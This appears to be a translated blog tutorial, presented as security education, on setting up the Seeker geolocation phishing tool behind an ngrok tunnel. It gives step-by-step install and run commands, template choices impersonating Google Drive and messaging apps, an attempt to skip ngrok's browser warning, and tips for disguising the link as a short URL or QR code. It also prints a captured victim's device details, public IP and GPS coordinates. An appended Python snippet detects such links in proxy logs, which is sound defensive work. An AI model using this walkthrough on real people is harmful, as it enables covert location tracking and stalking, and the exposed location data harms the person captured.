Foreword: this tool is purely a proof of concept (PoC) and is used here only for cybersecurity education. Its main purpose is to show that you should not casually click links of unknown origin and grant them sensitive permissions; if you do, you may expose your device information and even your location.
1. How it works: Seeker is a high-accuracy geolocation tracking tool and a favourite of social-engineering enthusiasts (https://github.com/thewhiteh4t/seeker). Seeker ships its own PHP server; combined with ngrok's tunnelling, it lets the operator passively collect information from whoever opens the link.
For earlier versions, see the previous post: "One link is all a hacker needs to track your location | Using the Seeker tool" (rYu1nser's blog, CSDN).
2. Versions tested and date
seeker version 1.2.8
ngrok version 3.2.2
26 March 2023
3. Basic setup
# Initial setup
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod +x install.sh
./install.sh
# Optional: edit the default page, index.html
┌──(kali㉿kali)-[~/seeker/template/gdrive]
└─$ ll
total 32
drwxr-xr-x 2 kali kali 4096 Apr 25 03:01 css
-rw-r--r-- 1 kali kali 46 Apr 25 03:01 error_handler.php
drwxr-xr-x 2 kali kali 4096 Apr 25 03:01 fonts
drwxr-xr-x 2 kali kali 4096 Apr 25 03:01 images
-rw-r--r-- 1 kali kali 1657 Apr 25 03:01 index.html
-rw-r--r-- 1 kali kali 44 Apr 25 03:01 info_handler.php
drwxr-xr-x 2 kali kali 4096 Apr 25 03:01 js
-rw-r--r-- 1 kali kali 46 Apr 25 03:01 result_handler.php
# Run a test
python3 seeker.py
[>] Created By : thewhiteh4t
|---> Twitter : https://twitter.com/thewhiteh4t
|---> Community : https://twc1rcle.com/
[>] Version : 1.2.8
[!] Select a Template :
[0] NearYou
[1] Google Drive
[2] WhatsApp
[3] WhatsApp Redirect
[4] Telegram
[5] Zoom
[6] Google ReCaptcha
[7] Custom Link Preview
# Select template 1 and enter the redirect URL: http://www.baidu.com
[>] 1
[+] Loading Google Drive Template...
[+] Enter GDrive File URL : http://www.baidu.com
[+] Port : 8080
[+] Starting PHP Server...[ ✔ ]
[+] Waiting for Client...[ctrl+c to exit]
# ngrok setup
# Download the Linux build and extract it
On Linux or Mac OS X you can unzip ngrok from the terminal with the following command. On Windows, just double-click ngrok.zip to extract it.
sudo unzip /path/to/ngrok.zip
or: sudo tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /home/kali/Downloads
or right-click the archive in the graphical file manager and extract it
# Register an ngrok account and add your authtoken to the default config (https://ngrok.com/download); replace xxxxxxxxxxxxxxxxxxxxxxxxxxxx with the token you were issued
ngrok config add-authtoken xxxxxxxxxxxxxxxxxxxxxxxxxxxx
# Running ngrok
ngrok help
# To start an HTTP tunnel forwarding to local port 8080, run:
ngrok http 8080
# Optional: turning off the ERR_NGROK_6024 browser warning page
# In ngrok 3.0 and later the ngrok-skip-browser-warning parameter was removed, so it cannot be used with ngrok 3.2.2 to skip the browser warning
#ngrok http 8080 --response-header-add ngrok-skip-browser-warning=true
# frp can also be used for the tunnel, but it requires a host with a public address: https://cloud.tencent.com/developer/article/1837482
# ngrok generates a link reachable from the internet that can be shared anywhere; it stops working when the service is stopped, and a new one is generated on every run
https://72b2-58-56-150-42.ngrok-free.app
# https://sina.lt/ was used to generate a short URL to disguise the link; this did not work well, as the page kept being flagged as illegal
https://t.hk.uy/b2xY
# Recommended instead: 草料二维码 (Caoliao), which generates a QR code directly for sharing
https://cli.im/text
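From the defender's side, the link shapes above are also what shows up in a proxy or DNS log. The following is an added example (my code, not part of this post or of the Seeker or ngrok projects): it scans constructed proxy-log lines for ngrok tunnel hostnames and the short-link domains used above, and for free-tier ngrok hostnames of the form shown (72b2-58-56-150-42.ngrok-free.app) it recovers the dashed IPv4 address embedded in the name, which is assumed here to be the public address of the host running the ngrok agent. The log format and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Hostnames worth flagging in proxy or DNS logs. Only the tunnel and short-link
# domains that appear in this write-up are listed; extend the tuples as needed.
TUNNEL_DOMAINS = ("ngrok-free.app", "ngrok.io", "ngrok.app")
SHORTENER_DOMAINS = ("t.hk.uy", "sina.lt")

# Free-tier ngrok hostnames such as 72b2-58-56-150-42.ngrok-free.app are assumed
# here to be 4 hex chars plus the agent host's public IPv4 address, dots as dashes.
NGROK_FREE_RE = re.compile(r"^[0-9a-f]{4}-(\d{1,3})-(\d{1,3})-(\d{1,3})-(\d{1,3})\.ngrok-free\.app$")

def embedded_ip(host):
    """Recover the dashed IPv4 address from a free-tier ngrok hostname, else None."""
    m = NGROK_FREE_RE.match(host.lower())
    octets = [int(o) for o in m.groups()] if m else []
    return ".".join(map(str, octets)) if octets and max(octets) <= 255 else None

def classify_host(host):
    """Return 'tunnel', 'shortener' or None for a hostname (subdomains included)."""
    host = host.lower().rstrip(".")
    for kind, domains in (("tunnel", TUNNEL_DOMAINS), ("shortener", SHORTENER_DOMAINS)):
        if any(host == d or host.endswith("." + d) for d in domains):
            return kind
    return None

def scan_proxy_log(lines):
    """Lines are '<client_ip> <method> <url>' (constructed); returns (client, host, kind, operator_ip) tuples."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        host = urlsplit(parts[2]).hostname or ""
        kind = classify_host(host)
        if kind:
            findings.append((parts[0], host, kind, embedded_ip(host)))
    return findings

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    "10.0.0.15 GET https://t.hk.uy/b2xY",
    "10.0.0.15 GET https://72b2-58-56-150-42.ngrok-free.app/",
    "10.0.0.15 POST https://72b2-58-56-150-42.ngrok-free.app/info_handler.php",
    "10.0.0.22 GET https://www.baidu.com/",
]

if __name__ == "__main__":
    for client, host, kind, ip in scan_proxy_log(SAMPLE_LOG):
        print(f"{client} -> {host} [{kind}] tunnel operator IP: {ip}")
```

A short link followed by a fresh ngrok-free.app hostname from the same client within seconds is the sequence this post produces, so the two findings are worth correlating rather than alerting on separately.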
# What the operator sees after the link is clicked
[!] Device Information :
[+] OS : CPU iPhone OS 16_4_1 like Mac OS X
[+] Platform : iPhone
[+] CPU Cores : 4
[+] RAM : Not Available
[+] GPU Vendor : Apple Inc.
[+] GPU : Apple GPU
[+] Resolution : 390x844
[+] Browser : Not Available
[+] Public IP : 221.215.103.62
[!] IP Information :
[+] Continent : Asia
[+] Country : China
[+] Region : Shandong
[+] City : Qingdao
[+] Org : China Unicom Shandong province network
[+] ISP : CHINA UNICOM China169 Backbone
[!] Location Information :
[+] Latitude : 36.35759909107096 deg
[+] Longitude : 120.08560071644327 deg
[+] Accuracy : 35 m
[+] Altitude : 19.932793378829956 m
[+] Direction : Not Available
[+] Speed : Not Available
[+] Google Maps : https://www.google.com/maps/place/36.35759909107096+120.08560071644327
[+] Data Saved : /home/kali/seeker/db/results.csv
[+] Waiting for Client...[ctrl+c to exit]
Common ngrok commands:
TERMS OF SERVICE: https://ngrok.com/tos
EXAMPLES:
ngrok http 8080 # forward ngrok subdomain to port 80
ngrok http example.com:9000 # forward traffic to example.com:9000
ngrok http --domain=bar.ngrok.dev 80 # request subdomain name: 'bar.ngrok.dev'
ngrok http --domain=example.com 1234 # request tunnel 'example.com' (DNS CNAME)
ngrok http --basic-auth='falken:joshua' 80 # enforce basic auth on tunnel endpoint
ngrok http --host-header=example.com 80 # rewrite the Host header to 'example.com'
ngrok http file:///var/log # serve local files in /var/log
ngrok http https://localhost:8443 # forward to a local https server
OPTIONS:
--authtoken string ngrok.com authtoken identifying a user
--basic-auth strings enforce basic auth on tunnel endpoint, 'user:password'
--cidr-allow strings reject connections that do not match the given CIDRs
--cidr-deny strings reject connections that match the given CIDRs
--circuit-breaker float reject requests when 5XX responses exceed this ratio
--compression gzip compress http responses from your web service
--config strings path to config files; they are merged if multiple
--domain string host tunnel on a custom subdomain or hostname (requires DNS CNAME)
-h, --help help for http
--host-header string set Host header; if 'rewrite' use local address hostname
--inspect enable/disable http introspection (default true)
--log string path to log file, 'stdout', 'stderr' or 'false' (default "false")
--log-format string log record format: 'term', 'logfmt', 'json' (default "term")
--log-level string logging level: 'debug', 'info', 'warn', 'error', 'crit' (default "info")
--mutual-tls-cas string path to TLS certificate authority to verify client certs in mutual tls
--oauth string enforce authentication oauth provider on tunnel endpoint, e.g. 'google'
--oauth-allow-domain strings allow only oauth users with these email domains
--oauth-allow-email strings allow only oauth users with these emails
--oauth-client-id string oauth app client id, optional
--oauth-client-secret string oauth app client secret, optional
--oauth-scope strings request these oauth scopes when users authenticate
--oidc string oidc issuer url, e.g. https://accounts.google.com
--oidc-client-id string oidc app client id
--oidc-client-secret string oidc app client secret
--oidc-scope strings request these oidc scopes when users authenticate
--proxy-proto string version of proxy proto to use with this tunnel, empty if not using
--region string ngrok server region [us, eu, au, ap, sa, jp, in] (default "us")
--request-header-add strings header key:value to add to request
--request-header-remove strings header field to remove from request if present
--response-header-add strings header key:value to add to response
--response-header-remove strings header field to remove from response if present
--scheme strings which schemes to listen on (default [https])
--verify-webhook string validate webhooks are signed by this provider, e.g. 'slack'
--verify-webhook-secret string secret used by provider to sign webhooks, if any
--websocket-tcp-converter convert ingress websocket connections to TCP upstream
(Screenshot) Registration:
(Screenshot) Running:
(Screenshot) Data returned; Seeker on the left, ngrok on the right:
(Screenshot) Other:
(Screenshot) Converted to a short URL:
(Screenshot) Converted to a QR code:
(Screenshot) Location accuracy: on a phone, positioning based on cellular base stations is fairly accurate; tests from a PC show a much larger error:
Summary: do not click any link whose source and purpose you cannot confirm, do not scan QR codes of unknown origin or purpose, and protect your personal information and property.